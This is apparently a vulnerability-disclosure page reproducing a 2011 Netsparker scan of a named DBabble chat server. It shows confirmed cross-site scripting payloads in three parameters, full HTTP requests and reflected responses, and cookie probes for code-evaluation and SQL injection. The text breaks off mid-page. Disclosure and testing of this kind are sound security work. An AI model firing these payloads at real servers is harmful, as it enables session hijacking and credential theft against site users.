XSS, Cross Site Scripting in smtp.netwin.co.nz:8132, CWE-79, CAPEC-86, DORK, GHDB

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading
Netsparker - Scan Report Summary
TARGET URL
 http://smtp.netwin.co.nz:8132/
SCAN DATE
 4/21/2011 7:22:14 PM
REPORT DATE
 4/21/2011 8:48:12 PM
SCAN DURATION
 00:27:32

Total Requests

19564

Average Speed

11.84 req/sec.
12
identified
6
confirmed
0
critical
4
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
33 %
MEDIUM
17 %
LOW
17 %
INFORMATION
33 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/dbabble cmd_get_js2 GET Cross-site Scripting Yes
lang GET Cross-site Scripting Yes
template GET Cross-site Scripting Yes
lang GET HTTP Header Injection No
template GET HTTP Header Injection No
Cookie Not Marked As HttpOnly Yes
[Possible] Internal Path Leakage (*nix) No
/help/English/changes.htm [Possible] Internal Path Leakage (Windows) No
/help/English/preferences.htm E-mail Address Disclosure No
/help/English/Standard/changes.htm [Possible] Internal Path Leakage (Windows) No
Cross-site Scripting

Cross-site Scripting
3 TOTAL
IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /dbabble

/dbabble CONFIRMED

http://smtp.netwin.co.nz:8132/dbabble?cmd_get_js2='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter Type Value
cmd_get_js2 GET '"--></style></script><script>alert(0x0011FE)</script>

Request

GET /dbabble?cmd_get_js2='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0011FE)%3C/script%3E HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Cookie: TEMPLATE=Standard; LANG=response.write(268409241-22)'
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 161
Connection: close
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:48 GMT
Cache-control: max-age=3600, must-revalidate
Content-Type: text/html


Unable to read ('"--></style></script><script>netsparker(0x0011FE)</script>) (/usr/local/dbabble/tpl/'"--></style></script><script>netsparker(0x0011FE)</script>)
- /dbabble

/dbabble CONFIRMED

http://smtp.netwin.co.nz:8132/dbabble?lang='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001..

Parameters

Parameter Type Value
lang GET '"--></style></script><script>alert(0x001207)</script>
template GET Standard

Request

GET /dbabble?lang='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001207)%3C/script%3E&template=Standard HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Cookie: TEMPLATE=Standard; LANG=(select convert(int
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 14888
Connection: close
Set-Cookie: LANG='"--></style></script><script>netsparker(0x001207)</script>; path=/; expires=Sat, 21 Apr 2012 00:22:49 GMT
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:49 GMT
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html


<html><head><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META HTTP-EQUIV="cache-control" CONTENT="no-cache"><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:9pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;} .small_font {font-size:8pt;} .big_font {font-size:12pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><script language="JavaScript"><!--function CheckVersion(){ document.writeln("<b>Warning - DBabble requires a web browser that Supports JavaScript 1.1 or higher.</b><br>"); document.writeln("<b>Your web browser only supports Javascript 1.0</b>");}function CheckBrowserVersion(){ ns4 = (document.layers)? true:false ns6 = (document.getElementById)? true:false ie4 = (document.all)? true:false if (!ns4 && !ie4 && !ns6) { document.writeln("<b>Warning - DBabble requires a more recent version of your web browser.</b><br>"); document.writeln("<b>For example Internet Explorer 4.0 or Netscape Navigator 4.0 or later.</b>"); }}// --></script><script language="JavaScript1.1"><!--function CheckVersion(){}// --></script><script language="JavaScript1.2"><!--function CheckVersion(){}// --></script><script language="JavaScript"><!--function FetchDate(){ x = new Date(); document.loginform.u_hour.value=x.getHours(); document.loginform.u_min.value=x.getMinutes(); document.loginform.u_sec.value=x.getSeconds(); document.loginform.u_day.value=x.getDate();}function PassOK(){ u=document.loginform.user.value; p=document.loginform.pass.value if (p=="") { txt="Guest".toLowerCase(); txt_len=txt.length; if (u.substring(0,txt_len).toLowerCase()!=txt) return 0; } return 1;}function SubmitCheck(){ u=document.loginform.user.value; if (u=="") { document.loginform.user.focus(); return false; } p=document.loginform.pass.value if (PassOK()==0) { document.loginform.pass.focus(); return false; } FetchDate(); document.loginform.qfiller.value='_'+(new Date()).getTime(); return true;}function Login2(){ FetchDate(); window.name="mainframe" document.loginform.qfiller.value='_'+(new Date()).getTime(); document.loginform.submit();}function Login() { u=document.loginform.user.value; if (u=="") return; if (PassOK()==0) return; Login2();}function KeyCode(evt){ return document.all ? event.keyCode : evt.which ? evt.which : evt.keyCode ? evt.keyCode : evt.charcode;}function PassCheck(e) { if (KeyCode(e)==13) { Login(); return false; } else return true;}function UserCheck(e) { if (KeyCode(e)==13) { if (PassOK()==0) { document.loginform.pass.focus(); return false; } Login2(); return false; } else return true;}function Startup(){ if (window.top!=window && window.location!="/dbabble") { window.location="/dbabble?cmd=top_frame_error"; } window.name="login"}function GuestLogin(){ document.loginform.user.value="Guest" document.loginform.pass.value=""; Login2();}function GuestLoginClearForm(){ document.loginform.new_window.value="" document.loginform.hide_menu_and_friends.value="" document.loginform.after_login_page.value="" document.loginform.after_logout_page.value="" document.loginform.override_dot_top.value="" document.loginform.override_main_name.value="" document.loginform.override_check_main_window.value="" document.loginform.target=""}function ClearFormSoon(){ setTimeout('GuestLoginClearForm()',2000)}function GuestLoginChatRoomInvite(gid,hide_menu_and_friends, invite_uid){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="3" pv="cmd=chat_list&gid="+gid if (invite_uid>0) { pv=pv+"&invite_hid=511&invite_uid="+invite_uid+"&invite_is_ugroup=0"; } document.loginform.after_login_page.value=pv; GuestLogin(); ClearFormSoon()}function GuestLoginChatRoom(gid,hide_menu_and_friends){ GuestLoginChatRoomInvite(gid,hide_menu_and_friends,0);}function GuestLoginDiscussion(gid,hide_menu_and_friends){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="2" document.loginform.after_login_page.value="cmd=group_items&gid="+gid; GuestLogin(); ClearFormSoon()}function GuestLoginNow(){ GuestLogin(); ClearFormSoon()}function GuestLoginTalkDo2(new_window,window_width, window_height, is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message, sub_frame_name, after_logout_page){ GuestLoginClearForm() txt="uid" if (is_ugroup) txt="ugid" document.loginform.after_logout_page.value=after_logout_page; if (new_window) { document.loginform.new_window.value="true" window.open("", "messageWindow", "width="+window_width+",height="+window_height+",resizable=yes") document.loginform.target="messageWindow" document.loginform.after_logout_page.value="javascript:window.close()" } if (sub_frame_name!="") { if (after_logout_page=="") { document.loginform.after_logout_page.value="blank.htm"; } document.loginform.override_dot_top.value=".top."+sub_frame_name document.loginform.override_main_name.value=sub_frame_name document.loginform.override_check_main_window.value="window.length>1 && window.top.frames[1].name=='"+sub_frame_name+"'" } if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="0" document.loginform.after_login_page.value="cmd=u_talk&hid=511&"+txt+"="+uid+"&talk_first_message="+escape(initial_message)+"&talk_other_first_message="+escape(other_initial_message)+"&talk_request_style="+talk_request_style+"&title_message="+escape(title_message)+"&leave_message="+escape(leave_message)+"&pick_first="+group_pick_first+"&heading_message="+escape(heading_message)+"&alt_message="+escape(alt_message);; document.loginform.window_title.value=title_message; setTimeout("GuestLoginNow()",250);}function GuestLoginTalkDo(new_window,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message){ GuestLoginTalkDo2(new_window,290,190,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message,"","")}function GuestLoginTalk(new_window, is_ugroup, uid,hide_menu_and_friends,initial_message){ other_initial_message="Hi, -NAME- here. How can I help you?" talk_request_style=1 // 0 = Send request to recipient as soon as clicking on the link // 1 = Send request as soon as you start typing // 2 = Send request as soon as you have finished typing a complete line GuestLoginTalkDo(new_window,is_ugroup,0,uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message,'','','','')}// --></script><title>DBabble login</title></head><body onload="Startup()" BACKGROUND="/img/whttxtr2.jpg"><LINK REL = "stylesheet" TYPE = "text/css" HREF = "/dbabble?cmd_get_js2=dbabble.css"><script language="JavaScript" src="/dbabble?cmd_get_js2=dbabble.js"></script><table bgcolor="black" width=100% border=0><tr> <td width=100% bgcolor="#336699" valign=center align=center><table border=0 cellpadding=0 cellspacing=0 margin=0><tr><td><img src="/img/netwin.gif" alt="Brought to you by NetWin Server Software - http://netwinsite.com" border=0</img></td><td><font class="huge_font" color="white">DBabble</font></td><td>&nbsp;&nbsp;&nbsp;</td><td><STYLE TYPE="text/css"><!-- A:VISITED.href_encode_class {color:white;} A:LINK.href_encode_class {color:white;}--></STYLE><font color="white">Brought to you by NetWin Server Software - <a class='href_encode_class' target='notvchat' href='http://netwinsite.com'>http://netwinsite.com</a></font></td></tr></table></td></tr></table><table><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">Language:</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><font color="white"><b>English</b></font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Espa�ol(Spanish)&template=Standard"><font color="white">Espa�ol(Spanish)</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Deutsch(German)&template=Standard"><font color="white">Deutsch(German)</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><br></tr></table><table><tr><td><font color="orange" style="font-size:12pt;"><b>DBabble for Windows</b></font>- You should download and install the DBabble Windows 95/98/ME/2000/2003/NT/XP client rather than using this web page if possible. It is much faster and easier to use. You can download it free from here. <a href="/files/DBabble27y_English.exe" style="font-size:12pt;">Download DBabble Version 2.7y</a>(1,901,847 bytes - should take about 5 minutes over a 56K modem)</td></tr></table><script language="JavaScript"><!--CheckVersion() CheckBrowserVersion()//--></script><NOSCRIPT><b> Warning - DBabble requires a web browser that Supports JavaScript 1.1 or higher.<br>Your web browser does not support Javascript or you have disabled it in your preferences.</b></NOSCRIPT><form style="margin:0" name="loginform" method="POST" target="_top" action="/dbabble"onSubmit="return SubmitCheck()"><table width=100%><tr><th colspan=2 align=left bgcolor=ivory>Login User Name & Password</th><th colspan=2" align=left bgcolor=ivory width=100%>Login Options</th></tr><tr><td><table><tr><td nowrap> User Name</td><td><input type="text" name="user" value="" size="20" onkeypress="return UserCheck(event)"></td></tr><tr><td nowrap> Password</td><td> <input type="password" name="pass" value="" size="20" onkeypress="return PassCheck(event)"></td></tr></table></td><td align="LEFT"><input align="LEFT" type="submit" class=spbutton onmouseover="MO(event)" onmouseout="MU(event)" value="Login" alt="Login" name="Login"></td><td><table><tr><td nowrap><input type=hidden name="is_save_password" value="true"><input type=radio name="save_name" value="name">Save Name</td></tr><tr><td nowrap><input type=radio name="save_name" value="pass">Save Name and Password</td></tr><tr><td nowrap><input type=radio name="save_name" checked value="neither">Neither</td></tr></table></td><td><table><tr><td>To simplify the interface you can optionally hide some features</td></tr><tr><td>Features:<select name="show_features"><option value="0" selected>Show All Features</option><option value="1" >Instant Messages Only</option><option value="2" >Forums Only</option><option value="3" >Chat Rooms Only</option><option value="4" >Chat Rooms and Forums Only</option><option value="5" >Chat Rooms and Instant Messages Only</option><option value="6" >Forums and Instant Messages Only</option></select></td></tr></table></td></tr></table><input type="hidden" name="r_login" value="Login"><input type="hidden" name="u_day" value=""><input type="hidden" name="u_hour" value=""><input type="hidden" name="u_min" value=""><input type="hidden" name="u_sec" value=""><input type="hidden" name="qfiller" value=""><input type="hidden" name="window_title" value=""><input type="hidden" name="change_lang" value="'"--></style></script><script>netsparker(0x001207)</script>"><input type="hidden" name="change_template" value="Standard"><input type="hidden" name="after_login_page" value=""><input type="hidden" name="hide_menu_and_friends" value=""><input type="hidden" name="after_logout_page" value=""><input type="hidden" name="override_dot_top" value=""><input type=hidden name="override_main_name" value=""><input type=hidden name="override_check_main_window" value=""><input type=hidden name="new_window" value="0"></form><script language="JavaScript"><!--document.loginform.user.focus();// --></script>Just login using your normal Email user name and password<br><table width=100%><tr><th align=left bgcolor=ivory>Guest Login</th></tr><tr><td>Alternatively you can login as a guest. Some DBabble features are not available as a guest.</td></tr><tr><td><a href="javascript:GuestLogin()">Guest login</a></td></tr></table><table width=100%><tr><th align=left bgcolor=ivory>Other Links</th></tr></table><a target='helpwin' href="/help/English/Standard/contents.htm">DBabble Online Help</a><br><a target='helpwin' href="/help/English/Standard/password.htm">Forgot your Password?</a><br><br>On this server we have 17 registered usersand 2 users are currently online.There is 1 chat roomand there is 1 forumcontaining a total of 306 articles.<br><br>You can use DBabble securely but slower through your web browser at <a href="https://netwin.co.nz:8133">https://netwin.co.nz:8133</a><hr>DBabble Linux Server Version 2.7z (Aug 25 2004)- Server up for 340 days since Sun, May 16 2010 4:44 pm<hr><font class=small_font>Powered by Netwin's <a href="http://netwinsite.com/dbabble/index.htm">DBabble secure chat, instant messaging and discussion server</a> software<table cellpadding="1" cellspacing="4"> <tr> <td class=small_font><b><a href="http://www.netwinsite.com">Netwin -- Server Software</a></b></font></td> <td class=small_font><a href="http://netwinsite.com/dnews.htm">DNews -- UseNet News Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/surgemail/index.htm">SurgeMail -- Mail Server Software</a></td> </tr> <tr> <td class=small_font><a href="http://netwinsite.com/webmail/index.htm">WebMail -- Web Mail Client</a></td> <td class=small_font><a href="http://netwinsite.com/surgeftp/index.htm">SurgeFTP -- Ftp Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/dbabble/index.htm">DBabble -- Chat Server, Instant Messaging, Discussions / Forums</a></td> </tr></table></font></body></html>
- /dbabble

/dbabble CONFIRMED

http://smtp.netwin.co.nz:8132/dbabble?lang=Espa%EF%BF%BDol(Spanish)&template='%22--%3E%3C/style%3E%3..

Parameters

Parameter Type Value
lang GET Espa�ol(Spanish)
template GET '"--></style></script><script>alert(0x001225)</script>

Request

GET /dbabble?lang=Espa%EF%BF%BDol(Spanish)&template='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001225)%3C/script%3E HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 15357
Connection: close
Set-Cookie: TEMPLATE='"--></style></script><script>netsparker(0x001225)</script>; path=/; expires=Sat, 21 Apr 2012 00:22:52 GMT,LANG=Espa�ol(Spanish); path=/; expires=Sat, 21 Apr 2012 00:22:52 GMT
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:52 GMT
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html


<html><head><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META HTTP-EQUIV="cache-control" CONTENT="no-cache"><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:9pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;} .small_font {font-size:8pt;} .big_font {font-size:12pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><script language="JavaScript"><!--function CheckVersion(){ document.writeln("<b>Advertencia - DBabble requiere un web browser que apoye el Javascript 1,1 o m�s alto.</b><br>"); document.writeln("<b>Your web browser only supports Javascript 1.0</b>");}function CheckBrowserVersion(){ ns4 = (document.layers)? true:false ns6 = (document.getElementById)? true:false ie4 = (document.all)? true:false if (!ns4 && !ie4 && !ns6) { document.writeln("<b>Warning - DBabble requires a more recent version of your web browser.</b><br>"); document.writeln("<b>For example Internet Explorer 4.0 or Netscape Navigator 4.0 or later.</b>"); }}// --></script><script language="JavaScript1.1"><!--function CheckVersion(){}// --></script><script language="JavaScript1.2"><!--function CheckVersion(){}// --></script><script language="JavaScript"><!--function FetchDate(){ x = new Date(); document.loginform.u_hour.value=x.getHours(); document.loginform.u_min.value=x.getMinutes(); document.loginform.u_sec.value=x.getSeconds(); document.loginform.u_day.value=x.getDate();}function PassOK(){ u=document.loginform.user.value; p=document.loginform.pass.value if (p=="") { txt="Invitado".toLowerCase(); txt_len=txt.length; if (u.substring(0,txt_len).toLowerCase()!=txt) return 0; } return 1;}function SubmitCheck(){ u=document.loginform.user.value; if (u=="") { document.loginform.user.focus(); return false; } p=document.loginform.pass.value if (PassOK()==0) { document.loginform.pass.focus(); return false; } FetchDate(); document.loginform.qfiller.value='_'+(new Date()).getTime(); return true;}function Login2(){ FetchDate(); window.name="mainframe" document.loginform.qfiller.value='_'+(new Date()).getTime(); document.loginform.submit();}function Login() { u=document.loginform.user.value; if (u=="") return; if (PassOK()==0) return; Login2();}function KeyCode(evt){ return document.all ? event.keyCode : evt.which ? evt.which : evt.keyCode ? evt.keyCode : evt.charcode;}function PassCheck(e) { if (KeyCode(e)==13) { Login(); return false; } else return true;}function UserCheck(e) { if (KeyCode(e)==13) { if (PassOK()==0) { document.loginform.pass.focus(); return false; } Login2(); return false; } else return true;}function Startup(){ if (window.top!=window && window.location!="/dbabble") { window.location="/dbabble?cmd=top_frame_error"; } window.name="login"}function GuestLogin(){ document.loginform.user.value="Invitado" document.loginform.pass.value=""; Login2();}function GuestLoginClearForm(){ document.loginform.new_window.value="" document.loginform.hide_menu_and_friends.value="" document.loginform.after_login_page.value="" document.loginform.after_logout_page.value="" document.loginform.override_dot_top.value="" document.loginform.override_main_name.value="" document.loginform.override_check_main_window.value="" document.loginform.target=""}function ClearFormSoon(){ setTimeout('GuestLoginClearForm()',2000)}function GuestLoginChatRoomInvite(gid,hide_menu_and_friends, invite_uid){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="3" pv="cmd=chat_list&gid="+gid if (invite_uid>0) { pv=pv+"&invite_hid=511&invite_uid="+invite_uid+"&invite_is_ugroup=0"; } document.loginform.after_login_page.value=pv; GuestLogin(); ClearFormSoon()}function GuestLoginChatRoom(gid,hide_menu_and_friends){ GuestLoginChatRoomInvite(gid,hide_menu_and_friends,0);}function GuestLoginDiscussion(gid,hide_menu_and_friends){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="2" document.loginform.after_login_page.value="cmd=group_items&gid="+gid; GuestLogin(); ClearFormSoon()}function GuestLoginNow(){ GuestLogin(); ClearFormSoon()}function GuestLoginTalkDo2(new_window,window_width, window_height, is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message, sub_frame_name, after_logout_page){ GuestLoginClearForm() txt="uid" if (is_ugroup) txt="ugid" document.loginform.after_logout_page.value=after_logout_page; if (new_window) { document.loginform.new_window.value="true" window.open("", "messageWindow", "width="+window_width+",height="+window_height+",resizable=yes") document.loginform.target="messageWindow" document.loginform.after_logout_page.value="javascript:window.close()" } if (sub_frame_name!="") { if (after_logout_page=="") { document.loginform.after_logout_page.value="blank.htm"; } document.loginform.override_dot_top.value=".top."+sub_frame_name document.loginform.override_main_name.value=sub_frame_name document.loginform.override_check_main_window.value="window.length>1 && window.top.frames[1].name=='"+sub_frame_name+"'" } if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="0" document.loginform.after_login_page.value="cmd=u_talk&hid=511&"+txt+"="+uid+"&talk_first_message="+escape(initial_message)+"&talk_other_first_message="+escape(other_initial_message)+"&talk_request_style="+talk_request_style+"&title_message="+escape(title_message)+"&leave_message="+escape(leave_message)+"&pick_first="+group_pick_first+"&heading_message="+escape(heading_message)+"&alt_message="+escape(alt_message);; document.loginform.window_title.value=title_message; setTimeout("GuestLoginNow()",250);}function GuestLoginTalkDo(new_window,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message){ GuestLoginTalkDo2(new_window,290,190,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message,"","")}function GuestLoginTalk(new_window, is_ugroup, uid,hide_menu_and_friends,initial_message){ other_initial_message="Hi, -NAME- here. How can I help you?" talk_request_style=1 // 0 = Send request to recipient as soon as clicking on the link // 1 = Send request as soon as you start typing // 2 = Send request as soon as you have finished typing a complete line GuestLoginTalkDo(new_window,is_ugroup,0,uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message,'','','','')}// --></script><title>DBabble conexi�n</title></head><body onload="Startup()" BACKGROUND="/img/whttxtr2.jpg"><LINK REL = "stylesheet" TYPE = "text/css" HREF = "/dbabble?cmd_get_js2=dbabble.css"><script language="JavaScript" src="/dbabble?cmd_get_js2=dbabble.js"></script><table bgcolor="black" width=100% border=0><tr> <td width=100% bgcolor="#336699" valign=center align=center><table border=0 cellpadding=0 cellspacing=0 margin=0><tr><td><img src="/img/netwin.gif" alt="Tra�do a usted por el software de NetWin Server - http://netwinsite.com" border=0</img></td><td><font class="huge_font" color="white">DBabble</font></td><td>&nbsp;&nbsp;&nbsp;</td><td><STYLE TYPE="text/css"><!-- A:VISITED.href_encode_class {color:white;} A:LINK.href_encode_class {color:white;}--></STYLE><font color="white">Tra�do a usted por el software de NetWin Server - <a class='href_encode_class' target='notvchat' href='http://netwinsite.com'>http://netwinsite.com</a></font></td></tr></table></td></tr></table><table><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">Lengua:</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=English&template=Standard"><font color="white">English</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><font color="white"><b>Espa�ol(Spanish)</b></font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Deutsch(German)&template=Standard"><font color="white">Deutsch(German)</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><br></tr></table><table><tr><td><font color="orange" style="font-size:12pt;"><b>DBabble para Windows</b></font>- Usted debe descargar e instalar el cliente de DBabble Windows 95/98/ME/2000/2003/NT/XP m�s bien que usar este Web page si es posible. Es mucho m�s r�pido y m�s f�cil utilizar. Usted puede descargarlo libremente de aqu�. <a href="/files/DBabble27y_Espa�ol(Spanish).exe" style="font-size:12pt;">Transferencia directa Versi�n 2.7y de DBabble</a>(1,947,161 bytes - debe tomar sobre 5 minutos sobre un m�dem 56K)</td></tr></table><script language="JavaScript"><!--CheckVersion() CheckBrowserVersion()//--></script><NOSCRIPT><b> Advertencia - DBabble requiere un web browser que apoye el Javascript 1,1 o m�s alto.<br>Su web browser no apoya Javascript o usted lo ha inhabilitado en sus preferencias.</b></NOSCRIPT><form style="margin:0" name="loginform" method="POST" target="_top" action="/dbabble"onSubmit="return SubmitCheck()"><table width=100%><tr><th colspan=2 align=left bgcolor=ivory>Nombre Y Contrase�a Del Usuario De la Conexi�n</th><th colspan=2" align=left bgcolor=ivory width=100%>Opciones De la Conexi�n</th></tr><tr><td><table><tr><td nowrap> Nombre de usuario</td><td><input type="text" name="user" value="" size="20" onkeypress="return UserCheck(event)"></td></tr><tr><td nowrap> Contrase�a</td><td> <input type="password" name="pass" value="" size="20" onkeypress="return PassCheck(event)"></td></tr></table></td><td align="LEFT"><input align="LEFT" type="submit" class=spbutton onmouseover="MO(event)" onmouseout="MU(event)" value="Iniciar sesi�n" alt="Iniciar sesi�n" name="Iniciar sesi�n"></td><td><table><tr><td nowrap><input type=hidden name="is_save_password" value="true"><input type=radio name="save_name" value="name">Excepto Nombre</td></tr><tr><td nowrap><input type=radio name="save_name" value="pass">Excepto nombre y contrase�a</td></tr><tr><td nowrap><input type=radio name="save_name" checked value="neither">Ni unos ni otros</td></tr></table></td><td><table><tr><td>Para simplificar el interfaz usted puede ocultar opcionalmente algunas caracter�sticas</td></tr><tr><td>Caracter�sticas:<select name="show_features"><option value="0" selected>Demuestre Todas las Caracter�sticas</option><option value="1" >Mensajes Inmediatos Solamente</option><option value="2" >Grupos de discusi�n solamente</option><option value="3" >Salas de charla solamente</option><option value="4" >Cuartos y discusiones de la charla solamente</option><option value="5" >Cuartos de la charla y mensajes inmediatos solamente</option><option value="6" >Discusiones y mensajes inmediatos solamente</option></select></td></tr></table></td></tr></table><input type="hidden" name="r_login" value="Login"><input type="hidden" name="u_day" value=""><input type="hidden" name="u_hour" value=""><input type="hidden" name="u_min" value=""><input type="hidden" name="u_sec" value=""><input type="hidden" name="qfiller" value=""><input type="hidden" name="window_title" value=""><input type="hidden" name="change_lang" value="Espa�ol(Spanish)"><input type="hidden" name="change_template" value="'"--></style></script><script>netsparker(0x001225)</script>"><input type="hidden" name="after_login_page" value=""><input type="hidden" name="hide_menu_and_friends" value=""><input type="hidden" name="after_logout_page" value=""><input type="hidden" name="override_dot_top" value=""><input type=hidden name="override_main_name" value=""><input type=hidden name="override_check_main_window" value=""><input type=hidden name="new_window" value="0"></form><script language="JavaScript"><!--document.loginform.user.focus();// --></script>Conexi�n justa usando su nombre y contrase�a normales del usuario del email<br><table width=100%><tr><th align=left bgcolor=ivory>Conexi�n De la Hu�sped</th></tr><tr><td>Usted puede alternativomente conexi�n como hu�sped. Las caracter�sticas de alg�n DBabble no est�n disponibles como hu�sped.</td></tr><tr><td><a href="javascript:GuestLogin()">Conexi�n de la hu�sped</a></td></tr></table><table width=100%><tr><th align=left bgcolor=ivory>Otras Conexiones</th></tr></table><a target='helpwin' href="/help/Espa�ol(Spanish)/Standard/contents.htm">Ayuda En l�nea de DBabble</a><br><a target='helpwin' href="/help/Espa�ol(Spanish)/Standard/password.htm">�Se olvid� de su contrase�a?</a><br><br>En este servidor tenemos 17 los usuarios registradosy los usuarios de 2 est�n actualmente en l�nea.Hay 1 sitio de la charlay hay 1 grupo de discusi�ncontener un total de art�culos de 306.<br><br>Usted puede utilizar DBabble con seguridad pero un directo m�s lento su web browser en <a href="https://netwin.co.nz:8133">https://netwin.co.nz:8133</a><hr>DBabble Linux versi�n del servidor de 2.7z (Aug 25 2004)- Servidor disponible para 340 d�as desde Dom, May 16 2010 4:44 pm<hr><font class=small_font>Powered by Netwin's <a href="http://netwinsite.com/dbabble/index.htm">DBabble secure chat, instant messaging 